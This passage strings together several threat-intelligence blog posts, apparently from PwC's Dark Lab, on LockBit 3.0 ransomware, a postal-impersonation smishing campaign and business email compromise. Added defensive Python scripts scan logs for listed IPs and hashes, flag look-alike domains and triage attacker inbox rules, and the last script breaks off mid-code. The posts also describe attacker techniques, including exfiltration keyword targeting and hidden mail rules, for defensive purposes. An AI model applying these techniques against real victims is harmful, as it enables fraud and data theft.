LockBit 3.0: New Capabilities Unlocked

LockBit persists as the most prominent Ransomware-as-a-Service (RaaS) group in 2022, showcasing heightened capabilities in its LockBit 3.0 iteration and a persistent drive to continuously evolve.

As the LockBit RaaS group re-emerges with their new and improved ransomware, LockBit 3.0 (also known as LockBit Black), we observed new capabilities and a heightened sophistication based on their increased frequency of attack and speed to impact, posing an ever-growing threat to organisations worldwide.

PwC’s Dark Lab observed over 860 breaches between 1 October 2021 and 31 October 2022 attributed to the LockBit RaaS group. 19% of global LockBit incidents impacted the Asia Pacific (APAC) region, with the industries most prominently targeted in the region being Professional Services and Manufacturing Services, comprising 44% of total incidents observed in APAC. Despite this, we assess that the group remains opportunistic by nature; these statistics likely reflect that certain industries are more likely victims because of their overall lower maturity of controls when compared to regulated industries.

Figure 1: Dark Lab Observed Over 860 LockBit Incidents from LockBit’s Leak Site between October 2021 and October 2022

Figure 2: Industry Breakdown of LockBit Targeting in APAC according to LockBit’s Leak Site

Comprising approximately 40% of all ransomware attacks against APAC observed between 1 October 2021 and 31 October 2022, LockBit presents a persistent threat to the region. This blog extends from our previous blogs covering LockBit 2.0 to focus on the new 3.0 iteration, highlighting novel tactics, techniques, and procedures (TTPs) observed in Dark Lab’s recent incident. [1] [2]

A Recent Encounter with LockBit 3.0

In Q3 2022, PwC’s Dark Lab responded to and contained a ransomware attack against a Chinese multinational conglomerate. The attack was attributed to the LockBit 3.0 RaaS group with high confidence, based on a number of key indicators aligning with LockBit’s typical attack vector.

Firstly, similar to previous LockBit 2.0 incidents observed by PwC’s Dark Lab, the vulnerability exploited to obtain valid credentials was an SSL VPN vulnerability. In this instance, CVE-2018-13379 was exploited – a vulnerability in Fortinet’s outdated FortiOS and FortiProxy versions whereby an authenticated attacker may exploit the SSL VPN web portal to download system files using custom HTTP requests. [3]

Secondly, PwC’s Dark Lab discovered the LockBit executable file .lockbit and the StealBit.exe information stealer tool in the compromised environment, both of which are malware commonly deployed by the LockBit RaaS group. [4]

Filename     LockBit.exe
MD5          ad2918181f609861ccb7bda8ebcb10e5
File Type    Win32 EXE
File Size    163,328 bytes

Filename     Stealbit.exe
MD5          72e3efc9f6c7e36a7fb498ab4b9814ac
File Type    Win32 EXE
File Size    441,856 bytes

StealBit.exe is a versatile, configurable information stealer with observed customisable configurations including the ability to specify network limit, maximum file size, filtering of files by keywords and file extensions, and optional features such as self-deletion and ScanShares.

A notable observation of the StealBit.exe running process was the list of keywords to filter and identify files for exfiltration, including keywords used to target files relating to specified insurance companies. Dark Lab hypothesises StealBit.exe was used to target information on the victim organisation’s insurance policy to understand their coverage pertaining to data breaches and ransomware attacks and adapt their ransom price accordingly. We posit this is a means of increasing the likelihood of their demanded ransom payment by targeting the victim’s insurance coverage, meaning that ransom payment would be covered by the insurance company, rather than the victim itself. Further, we observe keywords such as ‘violation’, ‘tax’, ‘evasion’, likely to collect evidence of the targeted victim’s misconduct to use as blackmail in the event the victim refuses to pay the ransom.

In examining the encryption process of lockbit.exe, we observed a total encryption time of 3.8 minutes for 3,957 files (total file size 3080.16 megabytes), approximating an encryption speed of 13.6 megabytes per second. This comparatively fast encryption speed shows the heightened capability of the LockBit ransomware, which various security researchers have observed to have the highest encryption speed across ransomware families. [5]

Thirdly, Dark Lab observed a notable differentiator in comparison with previous LockBit 2.0 encounters: the presence of code from the legacy RaaS group BlackMatter embedded in the LockBit codebase, signifying that the LockBit 3.0 iteration was executed in this incident. BlackMatter was a notorious RaaS group active from July 2021 to October 2021, known for targeting the U.S. health sector and suspected to be a rebranding of the DarkSide RaaS group. [6]

As observed by security researchers in the wake of LockBit 3.0, the new iteration of LockBit appears to borrow code from the legacy group, with notable new features adopted from BlackMatter. This was further validated in an interview with the alleged LockBit founder, confirming that in preparation for LockBit 3.0 the group purchased the BlackMatter source code to enhance the ransomware. [7] Features utilised from the BlackMatter source code include API harvesting for privilege escalation, self-deletion of shadow copies using WMI via COM objects, and the elimination of pre-existing bugs. [8]

Further investigation into the lockbit.exe executable file confirmed traces to LockBit 3.0. As evidenced below, the malware is a known malicious file matching YARA rules pinpointing relations to LockBit and BlackMatter respectively.

Figure 3: VirusTotal flagged that the LockBit executable file indicated matches to LockBit and BlackMatter
Figure 4: Evidence of LockBit 3.0 ransomware deployed in incident “95ddbeacd79ad7d944e75f55ca323a13076b756c4accefd28e206a76b3ea268b” and confirmed association with BlackMatter

The Future of LockBit

The LockBit RaaS group has demonstrated persistence and shows no sign of halting operations. This is observed in the first-ever ransomware bug bounty program launched by the group in June 2022, awarding up to US$1 million to anyone able to identify critical bugs or provide innovative ideas to enhance their LockBit 3.0 ransomware. This not only exemplifies their financial viability, but also implies their intention to continue enhancing their offerings as a means of providing high consumer confidence and of retaining and growing their affiliate base.

Figure 5: Screenshot of LockBit’s Bug Bounty Program Advertised on their Leak Site
Figure 6: Screenshot of LockBit’s Bug Bounty Program Advertised on their Leak Site

LockBit is recognised as a leader in the RaaS landscape, offering one of the best affiliate recruitment programs. This is largely due to their unique payment structure which favours affiliates and their lack of political association. [9] In an interview with an alleged LockBit member held in July 2022, the LockBit representative accredits their successful affiliate recruitment program to their emphasis on “honesty”, priding themselves as the only affiliate group known to “not touch the ransoms obtained by partners”. [10]

In a more recent interview on 30 October 2022, the blog vx-underground [11] spoke with the alleged founder of LockBit on the affiliate payment structure and origin story of the group. It was confirmed that LockBit’s founding members gain a 20% cut of affiliates’ profits, with this increasing to 30-50% in the event that the affiliate requires additional support from the group in performing negotiations with the targeted victim. The representative further confirmed that LockBit currently comprises 10 core members (including pen testers, money launderers, testers, and negotiators) and an affiliate base of over 100 affiliates – which they aspire to grow to 300.

As observed in both interviews, LockBit has secured themselves as a market leader in the RaaS landscape due to their favourable payment structure, strong affiliate support system, and neutral political stance. As implied in the latest interview, the group endeavours to continue expanding their affiliate base which will reflect in a continuous enhancing of their ransomware products to differentiate themselves amongst other RaaS operators to attract new joiners. We posit that the RaaS scene will continue to expand as the competitive landscape will drive more effective, enticing ransomware packages – increasing accessibility and scale of operations for financially-driven low skill-levelled hackers – complete with instructions, toolkits, and custom malware to execute large-scale attacks.

Notably, LockBit affiliates are known to re-use known initial access points (e.g. SSL VPN vulnerabilities – Citrix Gateway (CVE-2019-19781), Pulse Secure (CVE-2019-11510), Fortinet FortiOS (CVE-2018-13379)). However, as per our post on LockBit 2.0’s SonicWall exploit to bypass multi-factor authentication (MFA) [12], the group is not averse to deviating from their usual attack path as we observed the affiliate chain a known SQLi vulnerability (CVE-2019-7481 or CVE-2021-20028) with an undisclosed zero-day vulnerability to circumvent the MFA access control of the victim’s SonicWall SRA SSL VPN.

A further evolution in LockBit’s attack path is their announcement that they will begin executing triple extortion tactics. This is in retaliation for the incident with security company Entrust, in which LockBit’s corporate data leak site was targeted by a Distributed Denial of Service (DDoS) attack allegedly executed by Entrust to stop LockBit from leaking Entrust’s compromised data. This prompted LockBit RaaS to announce that they will add a third extortion tactic for maximum impact on targeted victims.

Figure 7: LockBit’s Triple Extortion Attack Path

Conclusion

LockBit 3.0 affiliates work on behalf of the LockBit group to conduct ransomware campaigns against organisations and industries across the globe. As previously posited in our technical analysis of LockBit 2.0 [13], the RaaS group is financially driven, and across the incidents we observed, affiliates with diversified capabilities and skillsets exploit SSL VPN vulnerabilities to circumvent MFA access controls and obtain initial access. Organisations are encouraged to review the TTPs leveraged by LockBit affiliates, as observed in our recent incident response experience, to improve their preventive and detective controls.

Check out our previous LockBit blogs for the full technical analysis:

  • LockBit 2.0 affiliate’s new SonicWall exploit bypasses MFA [14]
  • Technical analysis of LockBit 2.0 affiliates’ SonicWall exploit that bypasses MFA [15]

Recommendations

As RaaS groups continuously persist and evolve their attack vectors, it is vital that organisations implement robust, layered defence strategies based on the concept of zero trust.

Preventative

  • Enforce a layered defence strategy incorporating secure network security protocols (including but not limited to firewall, proxy filtering, intrusion detection systems (IDS), intrusion prevention systems (IPS), secure VPNs and security gateways).
  • Optimise security application configurations for effective coverage, tailoring rules and configurations to business needs, or ensuring that out-of-the-box (OOTB) configurations provide adequate coverage.
  • Update your blacklist with the indicators of compromise (IoCs) shared below and block outgoing network connections to the identified C2 server. We encourage you to visit our previous LockBit blogs for an expansive list of LockBit IoCs identified by PwC’s Dark Lab.
  • Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).

Detective

  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, for example by ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
  • Regularly scan your network environment for potential vulnerability exposure and remediate immediately, for example by deploying available patches, establishing regular update schedules and periodically reviewing configuration settings for potential misconfigurations.
  • Conduct a search of historical logs to detect any potential presence in your network environment, ensuring that an alert system is established should any indicators be identified. If any indicators are discovered, it is advised that a digital forensic investigation is conducted to identify the impact potentially already incurred, including the compromised information and systems, and to apply the appropriate containment and remediation measures.

Indicators of Compromise (IoCs)

We include the observed IoCs in our encounter with LockBit 3.0.

Indicator                           Type
162[.]214[.]152[.]179               External server of StealBit
72e3efc9f6c7e36a7fb498ab4b9814ac    Stealbit.exe (MD5)
ad2918181f609861ccb7bda8ebcb10e5    Lockbit.exe (MD5)
131[.]107[.]255[.]255               IP Address
23[.]216[.]147[.]64                 IP Address
20[.]99[.]132[.]105                 IP Address
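To put the table above to use in a retrospective log sweep, the following Python script (an added example, not part of the post and not Dark Lab’s tooling) refangs the listed indicators and scans log lines for the IP addresses and MD5 hashes. The log lines and their key=value layout are constructed for the example; hashes are matched case-insensitively because EDR products commonly log them in upper case.

```python
import re
from dataclasses import dataclass

# Indicators exactly as listed in the post above (kept defanged with "[.]").
IOC_IPS = {
    "162[.]214[.]152[.]179": "External server of StealBit",
    "131[.]107[.]255[.]255": "IP Address",
    "23[.]216[.]147[.]64": "IP Address",
    "20[.]99[.]132[.]105": "IP Address",
}
IOC_MD5 = {
    "72e3efc9f6c7e36a7fb498ab4b9814ac": "Stealbit.exe",
    "ad2918181f609861ccb7bda8ebcb10e5": "Lockbit.exe",
}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def refang(indicator):
    """Convert a defanged indicator ("1[.]2[.]3[.]4") into its matchable form."""
    return indicator.replace("[.]", ".").strip()


@dataclass(frozen=True)
class Hit:
    line_no: int    # 1-based index into the scanned log lines
    indicator: str  # the refanged value that matched
    label: str      # the description from the IoC table
    kind: str       # "ip" or "md5"


def scan_logs(lines, ips=IOC_IPS, md5s=IOC_MD5):
    """Return every IoC hit found in an iterable of log lines.

    IPs are matched as whole dotted quads (so 162.214.152.17 does not match
    162.214.152.179) and hashes case-insensitively.
    """
    ip_map = {refang(k): v for k, v in ips.items()}
    md5_map = {k.lower(): v for k, v in md5s.items()}
    hits = []
    for line_no, line in enumerate(lines, start=1):
        for ip in IP_RE.findall(line):
            if ip in ip_map:
                hits.append(Hit(line_no, ip, ip_map[ip], "ip"))
        for digest in MD5_RE.findall(line):
            digest = digest.lower()
            if digest in md5_map:
                hits.append(Hit(line_no, digest, md5_map[digest], "md5"))
    return hits


# Constructed sample lines (not from the incident): a firewall log and an EDR
# file/process feed in a simple key=value format assumed for this example.
SAMPLE_LOGS = [
    "2022-09-14T02:11:09Z fw action=deny src=10.20.30.41 dst=162.214.152.179 dport=443",
    "2022-09-14T02:11:12Z edr event=file_create host=WS-017 path=C:\\Users\\Public\\Stealbit.exe md5=72E3EFC9F6C7E36A7FB498AB4B9814AC",
    "2022-09-14T02:12:40Z fw action=allow src=10.20.30.41 dst=203.0.113.10 dport=443",
    "2022-09-14T02:15:03Z edr event=process_start host=WS-017 image=C:\\Users\\Public\\Lockbit.exe md5=ad2918181f609861ccb7bda8ebcb10e5",
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit.line_no}: {hit.kind} {hit.indicator} -> {hit.label}")
```

The three rows labelled only “IP Address” carry no context in the post, so treat a match on them as a lead to validate against your own telemetry rather than as confirmed compromise; in production, load indicators from a threat intelligence feed instead of hard-coding them.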

Further information

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Hong Kong and Singapore Citizens Actively Targeted by Large-Scale Global Smishing Campaign

PwC’s Dark Lab uncovers a large-scale smishing campaign actively targeting Hong Kong and Singapore citizens by masquerading as trusted and reputable locally based public and private postal service providers.

On 21 September 2022, PwC’s Dark Lab observed SMS phishing (smishing) activity targeting mobile users in Hong Kong. The message masqueraded as the postal service Hongkong Post – a government department of Hong Kong responsible for postal services – delivering a package to the victim. We posit that the intended purpose was to steal victims’ personally identifiable information (PII) and credit card details, based on similar information posted on social media.

Smishing campaigns that fraudulently use postal service branding are far from uncommon and have increased at an alarming rate as a result of the Covid-19 pandemic. We previously reported on a global campaign impacting Hong Kong, Macau, and Singapore users in our March 2022 blog post “Smells SMiShy to me…”.[1] This latest campaign caught our attention primarily because it appeared to be an active, large-scale smishing campaign impacting multiple Asia Pacific countries, including Hong Kong and Singapore. We release this blog post concurrent with the ongoing campaign to raise awareness among enterprises and individuals, and will continue tracking the threat actor’s activities as the campaign progresses.

Impersonating Hongkong Post

On 21 September 2022, PwC’s Dark Lab observed that Hongkong Post’s Track and Trace portal was being imitated by the newly registered domain hkpoieq[.]com. The domain was no more than one (1) day old, and requested that victims ‘change their delivery address’ for a fake order “AS658237789HK”. We did not observe the domain to have a mail exchanger (MX) record, which indicated that the threat actor did not intend this domain to be used with email.

Figure 1: Screenshot of the fraudulent Hongkong Post webpage that was hosted on hkpoieq[.]com

Upon further inspection of the domain, we observed that hkpoieq[.]com resolved to the IP address 155[.]94[.]163[.]222. The threat actor subsequently leveraged the same IP address to register an additional three (3) domains between 22 and 29 September 2022 – hkpoist[.]com, hkpoivt[.]com, and hkpoiec[.]com. The domains seemingly adopted a consistent naming convention whereby the alpha-2 ISO country code[2] was followed by an additional five (5) seemingly randomised letters. These domains were also registered over a short period of time and became unresolvable relatively quickly (under 3 days), so we were not able to obtain further information beyond the first screenshot to verify the objective of the impersonation. The short time for which the domains remained resolvable meant that security vendors did not have sufficient time to flag the domains and IP address as malicious as of the time of writing[3], which increases the challenge of detecting and responding in a timely manner.

However, we were able to retrieve a separate smishing message with a separate domain hkrocit[.]com that also impersonated Hongkong Post on 9 October 2022.

Figure 2: Smishing message from the threat actor to a Hongkong Post customer. Translation: “The courier delivery failed to be delivered by the courier without a signature. Please update your address at hkrocit[.]com”

Though the naming convention of the domain hkrocit[.]com followed a similar format to hkpoieq[.]com, we could not immediately correlate the two, as the second domain resolved to a different IP address, 155[.]94[.]140[.]247. Yet upon deeper inspection, we observed that both domains had been registered under the same Internet Service Provider (ISP), QuadraNet Enterprises LLC (QuadraNet), with Autonomous System Number (ASN) 8100. Furthermore, the threat actor continued the same pattern of operations by registering new domains, though with greater frequency, amounting to a total of 12 domains over 14 days (details in the Indicators of Compromise section). As of the time of writing, we have not observed further domains resolving to this IP address since they were flagged malicious on 14 October 2022.[4]

Given both a similar naming convention, a similar ASN and ISP, as well as the similar pattern of newly registered domains impersonating the same service provider, we assess with moderate confidence that it is the same threat actor conducting a persistent smishing campaign targeting Hong Kong citizens.

During our pivoting, we also observed three (3) domains registered between 29 September 2022 and 10 October 2022 that began with “sg” and resolved to 155[.]94[.]140[.]247. We extended our logic that the domain’s first two letters were the alpha-2 ISO country code, and through open-source investigation were able to observe that sgpoist[.]com had previously impersonated Singapore Post Limited (SingPost), which is the designated public postal licensee for Singapore. This gave weight to our hypothesis on the domain naming convention and increased our confidence that the campaign extends its targeting beyond Hong Kong to other countries such as Singapore.

Figure 3: Observing from records of previously conducted public searches on sgpoist[.]com to validate our hypotheses on the domain naming convention and identifying that the threat actor also impersonated Singapore Post Limited

The Final Confirmation…

The final confirmation that the threat actor had previously targeted other Asia Pacific countries such as Japan with the objective of stealing victims’ PII and credit card details was obtained through various posts on the social media platform Twitter. A simple search on 155[.]94[.]140[.]247 revealed that security researchers had previously alerted the public in April 2022 to phishing campaigns impersonating reputable retailers such as AEON[5] and Amazon Japan[6], highlighting QuadraNet as the questionable ISP.

Figure 4: Twitter posts that flag 155[.]94[.]140[.]247 as suspicious in April 2022 given impersonation of AEON and Amazon Japan

Similarly, on 23 September 2022, local news station Channel C HK reported on a similar case whereby four (4) teenagers were detained by Hong Kong Police Force for using stolen credit cards to purchase electronic devices. Their investigation found that the group allegedly obtained the stolen credentials by operating a fake Hongkong Post website and linking a mobile payment tool to the site to make purchases with the stolen credit card information.[7] While there is insufficient information to draw a correlation between both cases, this incident provides further insight into the likely motivations and intended impact of the threat actors behind QuadraNet. This is the final validation to strengthen our assessment that this is a large-scale phishing campaign likely initiated by cybercriminals that sought to gain profit via sale of PII and credit card information.

Target Shifted: Observing the Threat Actor Impersonating S.F. Express

As of the time of writing, we observed that the campaign is likely ongoing, though the behaviours of the threat actor have slightly changed. For example, S.F. Express is now the organisation being impersonated, with domains such as hkrzit[.]com, hkrmit[.]com, and hkrlit[.]com registered between 13 and 14 October 2022. The naming convention has also altered slightly, with the alpha-2 ISO country code now followed by an additional four (4) seemingly randomised letters instead of the original five (5). We posit that the threat actor will continue to conduct smishing to obtain PII and credit card information from unsuspecting victims, likely those based in Hong Kong.

Figure 5: Screenshot of the fraudulent S.F. Express webpage that was hosted on hkrzit[.]com

Conclusion – To Be Continued…

PwC’s Dark Lab observes that Hong Kong and Singapore are actively being targeted by a global large-scale persistent smishing campaign. We strongly encourage citizens to practice caution and awareness when interacting with communications, particularly of SMS origin as a result of the recent campaign. PwC’s Dark Lab will continue to monitor campaigns of varying scales, not just those that may target enterprises but also those that impact individuals. We will continue to investigate this ongoing campaign and invite readers to stay tuned for further updates and insights.

Recommendations for Individuals

  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt.
  • If you accidentally visit a phishing site, do not click on any links and check if any files were downloaded. Monitor your email’s ‘sent’ folder to identify if any unauthorized emails have been issued from your account. Alert the receiver, as well as your wider contact list that you may have fallen victim to a phishing attack so they can be on alert that incoming messages from your account may not be legitimate.
  • If you believe you have fallen victim to a phishing attack, we recommend that you perform a password reset, enable MFA, and report the suspected phishing activity immediately to your credit card issuers (and to your organisation if you accessed the site through your work device) so that they can monitor and restrict potentially suspicious activity.

Recommendations for Organisations

  • Organisations should monitor newly registered (young) domains and alert on potentially suspicious domains for further action – this is typically performed by your Security Operations Centre. For this particular case, we suggest looking for domains consisting of the alpha-2 ISO country codes of the countries you operate in followed by four (4) or five (5) randomised letters. We have already informed Hongkong Post and S.F. Express so that they can investigate and, if necessary, perform takedowns of the fake domains.
  • Organisations should enforce a layered defence strategy incorporating both defensive and preventative controls. This includes enforcing a zero trust model network- and organisation-wide.
  • Organisations should update their email security solution and network devices (including external firewalls and web proxies) to detect potential inbound/outbound connections involving the known-bad domains and IP addresses in this post.
  • Registrars should enhance their onboarding due diligence to reduce the risk of provisioning domains that impersonate legitimate brands, and conduct regular review activities of those domains to ensure their use for ethical and non-malicious activities.
  • Read our blog about Business Email Compromise (BEC) to learn more about targeting against organisations and the recommendations of how to prevent, detect and respond to a BEC attack.[8]
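The young-domain heuristic recommended above (and the naming convention described earlier for the Hongkong Post, SingPost and S.F. Express lures) can be expressed as a small triage routine. The Python below is an added example, not code from the post or from Dark Lab: it takes (domain, age_in_days) pairs from a newly-registered-domain feed and flags those shaped like <country code><4-5 letters>.com. The watched country codes, the “brand hint” letters and the sample ages are assumptions constructed for the example; the domains themselves are quoted from the post, plus two legitimate-looking controls.

```python
import re

# Country codes for the markets an organisation operates in. "hk" and "sg" are
# the codes observed in the post; "jp" is an assumption added because the post
# reports earlier Japanese targeting from the same IP address.
WATCHED_CC = {"hk", "sg", "jp"}

# Letters that follow the country code in the observed postal lures
# ("hkpo...", "sgpo..."). Assumption for this example, not a complete list.
BRAND_HINTS = ("po", "post")


def refang(domain):
    """Normalise a defanged domain ("hkpoieq[.]com") for matching."""
    return domain.replace("[.]", ".").strip().lower()


def cc_prefix(domain, ccs=WATCHED_CC, min_tail=4, max_tail=5):
    """Return the watched country code if the domain is <cc><4-5 letters>.com,
    the naming convention described in the post, otherwise None."""
    pattern = r"([a-z]{2})([a-z]{%d,%d})\.com" % (min_tail, max_tail)
    m = re.fullmatch(pattern, refang(domain))
    if m and m.group(1) in ccs:
        return m.group(1)
    return None


def triage_new_domains(records, ccs=WATCHED_CC, young_days=3):
    """Score newly registered domains.

    records: iterable of (domain, age_in_days) pairs. Returns a list of
    (domain, score, reasons) for domains matching the naming convention; the
    score is simply the number of reasons. Age and brand hints only raise the
    score, they never flag a domain on their own (far too noisy otherwise).
    """
    flagged = []
    for raw, age_days in records:
        domain = refang(raw)
        cc = cc_prefix(domain, ccs)
        if cc is None:
            continue
        reasons = [f"cc-prefix:{cc}"]
        tail = domain[2:-4]  # letters between the country code and ".com"
        if tail.startswith(BRAND_HINTS):
            reasons.append("brand-hint")
        if age_days <= young_days:
            reasons.append("young")
        flagged.append((domain, len(reasons), reasons))
    return flagged


# Constructed feed: domains quoted from the post plus two legitimate-looking
# controls; the ages are made up for the example.
SAMPLE_RECORDS = [
    ("hkpoieq[.]com", 1),
    ("hkrzit[.]com", 2),
    ("sgpoist[.]com", 9),
    ("sgpardrt[.]com", 1),      # six letters after the code: outside the stated pattern
    ("hongkongpost.com", 3650),
    ("hk.com", 8000),
]

if __name__ == "__main__":
    for domain, score, reasons in triage_new_domains(SAMPLE_RECORDS):
        print(f"{domain:<18} score={score} {', '.join(reasons)}")
```

Note that the pattern deliberately misses domains such as sgpardrt[.]com and singpirt[.]com from the IoC table, which fall outside the four-to-five-letter convention the post describes; widen min_tail/max_tail if your own feed shows the actor drifting, and feed the flagged domains into the blocklist and takedown process described above.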

Indicators of Compromise (IoCs)

IoC                         Type
155[.]94[.]140[.]247        IP Address
155[.]94[.]163[.]222        IP Address
hkpoivt[.]com               Malicious Domain
xiewen[.]xyz                Malicious Domain
hkpoiec[.]com               Malicious Domain
hkpoieq[.]com               Malicious Domain
hkpocn[.]com                Malicious Domain
hkpoir[.]com                Malicious Domain
hkpoie[.]com                Malicious Domain
hkpoet[.]com                Malicious Domain
hkpoik[.]com                Malicious Domain
hkpoim[.]com                Malicious Domain
hkpois[.]com                Malicious Domain
hkpoei[.]com                Malicious Domain
hkrmit[.]com                Malicious Domain
hkrzit[.]com                Malicious Domain
hkrlit[.]com                Malicious Domain
hkrxit[.]com                Malicious Domain
hkrcit[.]com                Malicious Domain
hkrocit[.]com               Malicious Domain
hkromit[.]com               Malicious Domain
hkroist[.]com               Malicious Domain
hkpoist[.]com               Malicious Domain
hkporut[.]com               Malicious Domain
linkblti[.]com              Malicious Domain
hkrqit[.]com                Malicious Domain
hkrwit[.]com                Malicious Domain
cadpoxit[.]com              Malicious Domain
cadpocit[.]com              Malicious Domain
sgpardrt[.]com              Malicious Domain
sgporut[.]com               Malicious Domain
sgpoist[.]com               Malicious Domain
cadporv[.]com               Malicious Domain
cadporc[.]com               Malicious Domain
mazsn[.]com                 Malicious Domain
anazch[.]com                Malicious Domain
anazc[.]com                 Malicious Domain
anazcm[.]com                Malicious Domain
aeomn[.]com                 Malicious Domain
anazsm[.]com                Malicious Domain
singpirt[.]com              Malicious Domain
hkpoiat[.]com               Malicious Domain
foodpre[.]com               Malicious Domain
likntbl[.]com               Malicious Domain
gobmxp[.]com                Malicious Domain
xwssr[.]xiewen[.]xyz        Malicious Domain
ssr[.]xiewen[.]xyz          Malicious Domain
cloud[.]thexw[.]cn          Malicious Domain
ssr[.]thexw[.]cn            Malicious Domain


Phishing for Profit: Business Email Compromises

There are plenty of phish in the sea and they’re back with new tricks! Dark Lab responds to multiple business email compromise campaigns targeting Hong Kong. We outline two recent incidents, sharing the Tactics, Techniques, and Procedures (TTPs) observed, and recommendations on how to prevent, detect, and respond to a phishing attack.

Business email compromise (BEC) is a social engineering attack which broadly refers to a malicious threat actor attempting to defraud organisations by breaking into their email accounts and impersonating employees and third parties. These phishing attacks have existed for many years, yet remain prevalent due to their ability to continuously elicit emotional reactions from victims, thereby triggering an unintended response such as performing actions that lead to undesirable consequences. This is further exacerbated by the fact that BEC attacks typically yield a high return on investment given the low cost of setup and the ability to scale operations globally.

The impact of BEC attacks is most evident in the amount of reported losses. The Federal Bureau of Investigation (FBI) reported that BEC attacks amounted to a staggering US$43 billion financial loss globally between 2016 and 2021.[1] Meanwhile, the Hong Kong Computer Emergency Response Team Coordination Centre (HKCERT) reportedly handled 3,737 phishing incidents in 2021, which represented almost half of the total reportedly handled incidents and was up 7 percent from 2020, rising for the fourth consecutive year.[2]

PwC’s Dark Lab also responded to an increased number of BEC campaigns in 2022. Two particular incidents stood out for their automated “spray and pray” approach to achieve initial access, followed by performing calculated and stealthy manual actions to persist in the Microsoft 365 environment to facilitate ongoing reconnaissance with the aim of effectively impersonating their victim to convince other staff members to approve fund transfers to the threat actor’s bank account. We elaborate the tactics, techniques and procedures (TTPs) that these threat actors leveraged and provide our recommendations on how to prevent, detect, and respond to BEC attacks should they befall your organisation. We further examine the rising trend of phishing kits in large scale phishing operations, enabling low-skilled threat actors to develop compelling phishing campaigns and bypass multi-factor authentication.

Case Study: Global Campaign by Opportunistic Cybercriminal of Unknown Origin

PwC’s Dark Lab responded to an incident in 2Q 2022 that involved a local property investment, management, and development company. The victim’s Microsoft Office 365 account was compromised via a phishing email from the sender domain macopas[.]com, with a link re-directing the victim to a fake Outlook login portal developed and hosted by the threat actor. To convince the victim to provide their password, the Outlook page pre-populated their email address. Given the victim’s mailbox did not have multi-factor authentication (MFA) enabled, the threat actor could obtain full access to the mailbox with a valid password.

The threat actor proceeded to perform three (3) manual actions to persist in the environment and gain more insights on the business operations while remaining hidden. First, the threat actor created various mail rules for moving and/or deleting emails with keywords associated with the threat actor’s access activities. Second, the malicious billing email was sent directly from the victim’s mailbox to various internal staff. Third, a malicious Azure enterprise application named “Newsletter Software SuperMailer” was created by the victim’s account for persisted access; this was particularly useful as the threat actor successfully performed re-logon to the compromised account even after the password was updated. The threat actor was only denied re-entry after MFA for the victim’s mailbox was enforced.

Through review of the available logs, we were able to observe via email trace that the attacker-controlled IP address delivered the same phishing emails to over three hundred (300) addresses of the victim organisation in alphabetical order. Meanwhile, we discovered through open-source information that similar emails had been sent to at least twenty (20) additional organisations globally. The fact that the threat actor was observed to perform the first login only two days after the password was entered suggests they spent time retrieving, studying, and utilising their haul of phished credentials. These indicators and behaviours are more reflective of an opportunistic “spray and pray” campaign, given the lack of urgency to quickly establish persistence. This is also evident in the end-to-end incident period lasting just under ten (10) days.

Case Study: Nigerian Cybercriminals Exploit Trusted Relationships with Hong Kong Branch Employee to Commit Cyber Fraud

PwC’s Dark Lab responded to a second BEC incident in 3Q 2022 involving a Chinese e-payment terminal solutions service provider with global operations. Similar to the case above, MFA was not enabled, and the threat actor was observed to host phishing domains imitating the Outlook login portal, enabling the threat actor to obtain initial access with valid credentials. This case left a lasting impression for three reasons.

First, the threat actor spent up to three (3) weeks familiarising themselves with ongoing operations by logging in remotely from multiple geolocations (including the United States, Australia, Germany, and Nigeria) and modifying various mail rules and contact lists before executing their attack. The inbox rules hide emails specific to the transaction being targeted (e.g. emails from the legitimate parties, emails with transaction reference numbers or bank accounts in the body). The emails are moved to a rarely viewed “RSS Feeds” folder with “Mark as Read” enabled in an attempt to hide legitimate emails from the victim’s sight.
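Both case studies turn on attacker-created inbox rules: keyword-based move/delete rules that hide the attacker’s own access activity in the first case, and rules that file transaction-related mail into “RSS Feeds” marked as read in the second. The Python below is an added example (not the post’s code and not a Dark Lab tool) that triages an export of inbox rules for exactly those traits. The field names are modelled loosely on the parameters of the Microsoft 365 New-InboxRule/Set-InboxRule cmdlets and the keyword list is an assumption; the three sample rules are constructed, not taken from either incident.

```python
# Field names are an assumption modelled on the Microsoft 365 New-InboxRule /
# Set-InboxRule parameters; map your own audit export onto them.
HIDE_FOLDERS = {
    "rss feeds", "rss subscriptions", "deleted items", "junk email",
    "archive", "conversation history",
}
# Terms tied to the transaction-hijacking and access-hiding behaviour in the
# post; an assumption for the example, extend with your own invoice/PO formats.
KEYWORDS = (
    "invoice", "payment", "bank", "account", "transaction", "wire",
    "password", "sign-in", "suspicious", "unauthorised", "unauthorized",
)


def triage_inbox_rule(rule):
    """Return the reasons a rule looks like attacker persistence, or [] if none.

    A rule is only flagged when it has a hiding action (move to a rarely viewed
    folder, delete, mark as read, forward); keyword or sender conditions on
    their own are ordinary mailbox hygiene and would be far too noisy.
    """
    reasons = []
    folder = (rule.get("move_to_folder") or "").strip().lower()
    if folder in HIDE_FOLDERS:
        reasons.append(f"moves mail to '{folder}'")
    if rule.get("delete_message"):
        reasons.append("deletes mail")
    if rule.get("mark_as_read"):
        reasons.append("marks mail as read")
    if rule.get("forward_to"):  # not seen in the post's cases; a standard BEC check
        reasons.append("forwards mail to " + ", ".join(rule["forward_to"]))
    if not reasons:
        return []
    terms = [t.lower() for t in rule.get("subject_or_body_contains", [])]
    hits = [t for t in terms if any(k in t for k in KEYWORDS)]
    if hits:
        reasons.append("keyword condition: " + ", ".join(hits))
    if rule.get("from_contains"):
        reasons.append("scoped to specific senders")
    return reasons


def triage_rules(rules):
    """Return [(rule_name, reasons)] for every rule that triage flags."""
    flagged = []
    for rule in rules:
        reasons = triage_inbox_rule(rule)
        if reasons:
            flagged.append((rule.get("name", ""), reasons))
    return flagged


# Constructed sample export (not from either incident).
SAMPLE_RULES = [
    {   # ordinary user rule: filing a newsletter, nothing hidden
        "name": "Vendor newsletters",
        "from_contains": ["news@vendor.example"],
        "move_to_folder": "Newsletters",
        "mark_as_read": False,
        "delete_message": False,
        "subject_or_body_contains": [],
    },
    {   # the second case study's pattern: hide the targeted transaction
        "name": "..",
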